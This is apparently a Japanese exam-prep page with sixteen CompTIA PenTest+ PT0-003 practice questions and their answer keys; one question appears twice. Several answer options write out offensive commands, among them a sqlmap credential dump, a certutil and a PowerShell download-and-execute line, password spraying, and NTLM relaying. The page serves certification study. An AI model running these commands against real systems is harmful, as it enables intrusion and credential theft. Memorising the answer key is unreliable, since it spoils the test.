PT0-003試験無料問題集（241題）「CompTIA PenTest+ 認定」

出題：1

A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools. Which of the following is the best tool for the penetration tester to use?

A. WIGLE.net

B. Maltego

C. Caldera

D. SpiderFoot

正解：B 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：2

Which of the following describes the process of determining why a vulnerability scanner is not providing results?

A. Goal reprioritization

B. Peer review

C. Root cause analysis

D. Secure distribution

正解：C 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：3

During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?

A. sqlmap -u www.example.com/?id=1 --tables -D accounts

B. sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

C. sqlmap -u www.example.com/?id=1 --search -T user

D. sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

正解：D 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：4

A penetration tester reviews a SAST vulnerability scan report. The following vulnerability has been reported as high severity:
Source file: components.ts
Issue 2 of 12: Command injection
Severity: High
Call: .innerHTML = response
The tester inspects the source file and finds the variable response is defined as a constant and is not referred to or used in other sections of the code. Which of the following describes how the tester should classify this reported vulnerability?

A. False negative

B. True positive

C. False positive

D. Low severity

正解：C 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：5

Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?

A. Nmap

B. Burp Suite

C. masscan

D. hping

正解：C 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：6

During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The tester receives the results and then executes the following command:
snmpwalk -v 2c -c public 192.168.1.23
Which of the following is the tester trying to do based on the command they used?

A. Bypass defensive systems to collect more information.

B. Validate the results and remove false positives.

C. Script exploits to gain access to the systems and host.

D. Use an automation tool to perform the attacks.

正解：B 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：7

Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

A. Latches

B. Pins

C. Plug

D. Shackle

正解：B 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：8

Given the following statements:
* Implement a web application firewall.
* Upgrade end-of-life operating systems.
* Implement a secure software development life cycle.
In which of the following sections of a penetration test report would the above statements be found?

A. Attack narrative

B. Detailed findings

C. Recommendations

D. Executive summary

正解：C 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：9

A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools. Which of the following is the best tool for the penetration tester to use?

A. WIGLE.net

B. Maltego

C. Caldera

D. SpiderFoot

正解：B 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：10

Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?

A. The tester is evaluating a thick client application.

B. The tester is conducting a web application test.

C. The tester is assessing a mobile application.

D. The tester is creating a threat model.

正解：D 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：11

During a security assessment, a penetration tester captures plaintext login credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access.
Which of the following tools is the tester using?

A. Wireshark

B. Burp Suite

C. Metasploit

D. Zed Attack Proxy (ZAP)

正解：A 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：12

While performing an internal assessment, a tester uses the following command:
crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@
Which of the following is the main purpose of the command?

A. To perform password spraying on internal systems

B. To execute a command in multiple endpoints at the same time

C. To perform common protocol scanning within the internal network

D. To perform a pass-the-hash attack over multiple endpoints within the internal network

正解：A 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：13

Which of the following is within the scope of proper handling and is most crucial when working on a penetration testing report?

A. Making the report clear for all objectives with a precise executive summary

B. Keeping the report to a maximum of 5 to 10 pages in length

C. Basing the recommendation on the risk score in the report

D. Keeping both video and audio of everything that is done

正解：A 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：14

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

A. rundll32.exe c:\path\foo.dll,functName

B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe

C. powershell.exe impo C:\tools\foo.ps1

D. powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")

正解：B 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：15

A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:
line 1: #!/usr/bin/bash
line 2: DOMAINS_LIST = "/path/to/list.txt"
line 3: while read -r i; do
line 4: nikto -h $i -o scan-$i.txt &
line 5: done
The script does not work as intended. Which of the following should the tester do to fix the script?

A. Change line 2 to {"domain1", "domain2", "domain3", }.

B. Change line 3 to while true; read -r i; do.

C. Change line 5 to done < "$DOMAINS_LIST".

D. Change line 4 to nikto $i | tee scan-$i.txt.

正解：C 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：16

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following Nmap scan output:
Nmap scan report for some_host
Host is up (0.01s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
smb2-security-mode: Message signing disabled
Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

A. msf > use exploit/windows/smb/ms17_010_psexec

B. hydra -L administrator -P /path/to/passwdlist smb://<target>

C. responder -I eth0 -dwv ntlmrelayx.py -smb2support -tf <target>

D. nmap --script smb-brute.nse -p 445 <target>

正解：C 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

PT0-003試験無料問題集「CompTIA PenTest+ 認定」